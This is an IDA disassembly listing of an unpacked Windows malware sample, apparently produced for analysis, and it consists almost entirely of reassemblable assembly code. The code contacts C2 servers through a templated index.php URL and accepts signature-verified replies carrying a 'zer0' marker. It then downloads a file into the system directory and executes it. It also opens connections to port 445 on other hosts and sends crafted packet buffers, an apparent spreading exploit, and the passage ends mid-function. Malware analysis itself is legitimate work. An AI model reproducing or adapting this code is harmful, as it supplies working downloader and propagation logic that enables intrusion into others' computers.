;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B1738202B208938A661A16DB999F7BFC
; File Name : u:\work\b1738202b208938a661a16db999f7bfc_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 30900000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 30901000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30901000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_30901004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_30901008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3090100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_309027EB+1D�r
dword_30901010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_30901014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_309027EB+4E�r ...
dword_30901018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3090101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_30901020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_30901024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_30901028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3090102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_30901030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_30901034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_30901038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_30901040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_30901044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_30901048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3090104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_30901050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_30901054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_30901058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3090105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_30901060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_30901064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_30901068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_30902AC9+8F�r
dword_3090106C dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_309025B4+58�r
dword_30901070 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_30901074 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_30901078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3090107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_309011A0+F6�r ...
dword_30901080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_3090216F+57�r
dword_30901084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_30901422+64�r ...
dword_30901088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_309029FD+40�r
dword_3090108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_309029FD+1B�r
dword_30901090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_30901094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_309017B9+16C�r ...
dword_30901098 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_3090109C dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_309010A0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_30901DA8+2C�r
dword_309010A4 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_3090235D+D4�r
dword_309010A8 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_309010AC dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_30902897+92�r
dword_309010B0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:309022E1�r
dword_309010B4 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_309010B8 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_309010BC dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_30901F0A+12�r
dword_309010C0 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_309010C4 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_309010C8 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_309010CC dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_3090216F+66�r ...
dword_309010D0 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_309010D4 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_309010D8 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_309029FD+C3�r
dword_309010DC dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_309010E0 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_309029FD+F�r
align 8
dword_309010E8 dd 77C371BCh ; resolved to->MSVCRT.sranddword_309010EC dd 77C46F70h ; resolved to->MSVCRT.memcpydword_309010F0 dd 77C478A0h ; resolved to->MSVCRT.strlendword_309010F4 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_309010F8 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_30901F2B:loc_30901F3C�r ...
; ---------------------------------------------------------------------------
loc_309010FC: ; DATA XREF: UPX0:loc_30902C30�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_30901100 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_30902036:loc_30902067�r ...
dword_30901104 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_30901422+AA�r
dd 0
dword_3090110C dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_30901110 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_30901114 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_30901118 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_309015C7+77�r ...
align 10h
dword_30901120 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_309015C7+9D�r
dword_30901124 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_309015C7+89�r
dword_30901128 dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_3090112C dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:3090270B�r
dword_30901130 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_309015C7+B0�r
align 8
dword_30901138 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_3090113C dd 71AB3E00h ; resolved to->WS2_32.binddword_30901140 dd 71AB88D3h ; resolved to->WS2_32.listendword_30901144 dd 71AC1028h ; resolved to->WS2_32.acceptdword_30901148 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_3090114C dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_30901150 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_30901154 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_3090216F+AC�r
dword_30901158 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_3090267B+D�r
dword_3090115C dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_3090216F+F0�r
dword_30901160 dd 71AB406Ah ; resolved to->WS2_32.connectdword_30901164 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_30902036+67�r ...
dword_30901168 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_309017B9+1D8�r ...
dword_3090116C dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_30902036+11B�r
dword_30901170 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_30902036+122�r
align 8
dword_30901178 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 8
dword_30901188 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309011A0 proc near ; CODE XREF: sub_30901422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901124 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_309011CB
push 1
jmp loc_30901261
; ---------------------------------------------------------------------------
loc_309011CB: ; CODE XREF: sub_309011A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3090108C ; GetSystemDirectoryA
mov edi, dword_30901088
lea eax, [ebp+var_110]
push offset dword_30904230
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_30901084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_30901F2B
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_30904228
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_30901080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_30901241
push 2
jmp short loc_30901261
; ---------------------------------------------------------------------------
loc_30901241: ; CODE XREF: sub_309011A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_30901120 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_30901264
push [ebp+var_4]
call dword_3090107C ; CloseHandle
push 3
loc_30901261: ; CODE XREF: sub_309011A0+26�j
; sub_309011A0+9F�j
pop eax
jmp short loc_309012B5
; ---------------------------------------------------------------------------
loc_30901264: ; CODE XREF: sub_309011A0+B4�j
mov edi, 100000h
push edi
call sub_30902C07
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_30901130 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_30901078 ; WriteFile
push [ebp+var_4]
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_30901F5B
push ebx
call sub_30902C1B
add esp, 0Ch
xor eax, eax
loc_309012B5: ; CODE XREF: sub_309011A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_309011A0 endp
; =============== S U B R O U T I N E =======================================
sub_309012BA proc near ; CODE XREF: sub_30901422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_309012D1: ; CODE XREF: sub_309012BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_309012D1
pop edi
pop esi
pop ebx
retn
sub_309012BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901316 proc near ; CODE XREF: sub_3090139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_30901349
add ebx, 1Ah
loc_30901349: ; CODE XREF: sub_30901316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_30901104
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_30901373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901373: ; CODE XREF: sub_30901316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_30901393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901393: ; CODE XREF: sub_30901316+68�j
mov al, [ebp+arg_0]
loc_30901396: ; CODE XREF: sub_30901316+5B�j
; sub_30901316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090139B proc near ; CODE XREF: sub_30901422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_309013F8
mov edi, [ebp+arg_0]
push ebx
loc_309013B0: ; CODE XREF: sub_3090139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_30901316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_309013DC
cmp bl, 7Ah
jg short loc_309013DC
movsx esi, bl
sub esi, 61h
loc_309013DC: ; CODE XREF: sub_3090139B+34�j
; sub_3090139B+39�j
cmp bl, 41h
jl short loc_309013EC
cmp bl, 5Ah
jg short loc_309013EC
movsx esi, bl
sub esi, 41h
loc_309013EC: ; CODE XREF: sub_3090139B+44�j
; sub_3090139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_309013B0
pop ebx
jmp short loc_309013FB
; ---------------------------------------------------------------------------
loc_309013F8: ; CODE XREF: sub_3090139B+F�j
mov edi, [ebp+arg_0]
loc_309013FB: ; CODE XREF: sub_3090139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3090139B endp
; =============== S U B R O U T I N E =======================================
sub_30901402 proc near ; CODE XREF: sub_30901422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_30901406: ; CODE XREF: sub_30901402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_30901406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_30901402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901422 proc near ; CODE XREF: sub_309015C7+B7�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901178
push offset loc_30902C30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_30901100 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_309015A8
add edi, 4
mov [ebp+var_130], edi
jz loc_309015A8
push edi
call dword_30901084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_309015A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_309015A8
cmp ebx, 1Ah
jge loc_309015A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_30901104 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_309015A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3090139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_309012BA
lea eax, [ebp+var_164]
push eax
call sub_30901402
add esp, 1Ch
cmp [esi], al
jnz short loc_309015A8
push 44h
push offset dword_30904000
lea eax, [ebp+var_124]
push eax
call sub_309016E7
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_30901752
add esp, 18h
test eax, eax
jnz short loc_3090159B
cmp [ebp+var_174], edi
jz short loc_3090159B
lea eax, [ebp+var_11C]
push eax
call sub_309011A0
pop ecx
mov [ebp+var_128], edi
loc_3090159B: ; CODE XREF: sub_30901422+15C�j
; sub_30901422+164�j
lea eax, [ebp+var_124]
push eax
call sub_30901736
pop ecx
loc_309015A8: ; CODE XREF: sub_30901422+4E�j
; sub_30901422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309015C7 proc near ; CODE XREF: sub_3090169C+14�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_30902C07
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_30901090 ; GetLocaleInfoA
xor ebx, ebx
cmp [ebp+arg_4], bl
jz short loc_3090162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_30904FCC
push dword_30904FE4
push offset aDfashnzdsdl ; "dfashnzdsdl"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_30901118 ; wsprintfA
add esp, 1Ch
jmp short loc_30901647
; ---------------------------------------------------------------------------
loc_3090162F: ; CODE XREF: sub_309015C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_30901118 ; wsprintfA
add esp, 0Ch
loc_30901647: ; CODE XREF: sub_309015C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901124 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_30901120 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_30901130 ; InternetReadFile
push esi
call sub_30901422
push esi
call sub_30902C1B
mov esi, dword_30901128
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_309015C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3090169C proc near ; DATA XREF: sub_3090235D+119�o
push esi
loc_3090169D: ; CODE XREF: sub_3090169C+49�j
xor esi, esi
loc_3090169F: ; CODE XREF: sub_3090169C+47�j
inc esi
inc esi
mov al, byte_30904080[esi+esi*4]
push eax
push off_30904081[esi+esi*4]
call sub_309015C7
pop ecx
pop ecx
call dword_309010F8 ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_30902020
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_30901094 ; Sleep
cmp esi, 14h
jb short loc_3090169F
jmp short loc_3090169D
sub_3090169C endp
; =============== S U B R O U T I N E =======================================
sub_309016E7 proc near ; CODE XREF: sub_30901422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_30901034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_30901714
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_30901714
push 1
pop eax
jmp short loc_30901732
; ---------------------------------------------------------------------------
loc_30901714: ; CODE XREF: sub_309016E7+19�j
; sub_309016E7+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_30901038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_30901732: ; CODE XREF: sub_309016E7+2B�j
pop edi
pop esi
pop ebx
retn
sub_309016E7 endp
; =============== S U B R O U T I N E =======================================
sub_30901736 proc near ; CODE XREF: sub_30901422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3090102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_30901030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_30901736 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901752 proc near ; CODE XREF: sub_30901422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3090101C ; CryptCreateHash
test eax, eax
jnz short loc_30901778
push 1
pop eax
jmp short loc_309017B5
; ---------------------------------------------------------------------------
loc_30901778: ; CODE XREF: sub_30901752+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901020 ; CryptHashData
test eax, eax
jnz short loc_30901791
push 2
pop edi
jmp short loc_309017AA
; ---------------------------------------------------------------------------
loc_30901791: ; CODE XREF: sub_30901752+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_30901024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_309017AA: ; CODE XREF: sub_30901752+3D�j
push [ebp+arg_0]
call dword_30901028 ; CryptDestroyHash
mov eax, edi
loc_309017B5: ; CODE XREF: sub_30901752+24�j
pop edi
pop esi
pop ebp
retn
sub_30901752 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309017B9 proc near ; CODE XREF: sub_309024C8+36�p
; sub_3090252C+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_30902C50
mov eax, dword_30904CBC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_30904CC0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_30901154 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_30901D19
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_30901158 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_30901098 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_30904CB0
push eax
call dword_30901118 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_3090182C: ; CODE XREF: sub_309017B9+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_3090182C
push 60h
lea eax, [ebp+var_E4]
push offset dword_309047D0
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902C3C ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_30902C42 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_30902C3C ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902C3C ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902C3C ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_30902C42 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_30902C36 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_30902C36 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_3090115C ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_30901160 ; connect
cmp eax, 0FFFFFFFFh
jz loc_30901D0F
mov esi, dword_30901094
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_30901164
push 89h
push offset dword_309045B8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0A8h
push offset dword_30904644
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0DEh
push offset dword_309046F0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
